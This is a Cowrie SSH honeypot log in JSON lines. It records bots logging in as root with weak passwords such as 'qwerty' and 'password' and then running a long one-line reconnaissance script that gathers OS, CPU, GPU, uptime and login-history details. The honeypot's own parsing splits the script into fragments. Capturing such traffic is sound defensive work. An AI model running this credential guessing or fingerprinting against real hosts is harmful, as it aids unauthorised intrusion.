{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.080562Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.081367Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.082353Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.083408Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.084331Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.085071Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.086387Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.086986Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.087507Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.088039Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.088753Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.089365Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.353263Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.354162Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:42:56.355179Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61482,"dst_ip":"1.2.3.4","dst_port":22,"session":"133f413127a0","protocol":"ssh","message":"New connection: 217.72.205.35:61482 (1.2.3.4:22) [session: 133f413127a0]","sensor":"my-vps","timestamp":"2025-09-08T17:42:59.749572Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:42:59.750762Z","src_ip":"217.72.205.35","session":"133f413127a0"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":41980,"dst_ip":"1.2.3.4","dst_port":22,"session":"61d0f7d42425","protocol":"ssh","message":"New connection: 170.64.157.139:41980 (1.2.3.4:22) [session: 61d0f7d42425]","sensor":"my-vps","timestamp":"2025-09-08T17:44:10.741202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:44:10.742533Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:44:11.073167Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:44:12.408987Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:44:13.117680Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.118471Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.119363Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.120494Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.122013Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.123085Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.123866Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.124912Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.125376Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.125846Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.126293Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.126887Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.127464Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.459981Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.461017Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:44:13.462197Z","src_ip":"170.64.157.139","session":"61d0f7d42425"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":58056,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfc5027bba43","protocol":"ssh","message":"New connection: 170.64.157.139:58056 (1.2.3.4:22) [session: bfc5027bba43]","sensor":"my-vps","timestamp":"2025-09-08T17:45:29.477181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:45:29.478547Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:45:29.746252Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:45:30.551480Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:45:31.173218Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.173919Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.174607Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.175565Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.176590Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:45:31.177503Z","src_ip":"170.64.157.139","session":"bfc5027bba43"}
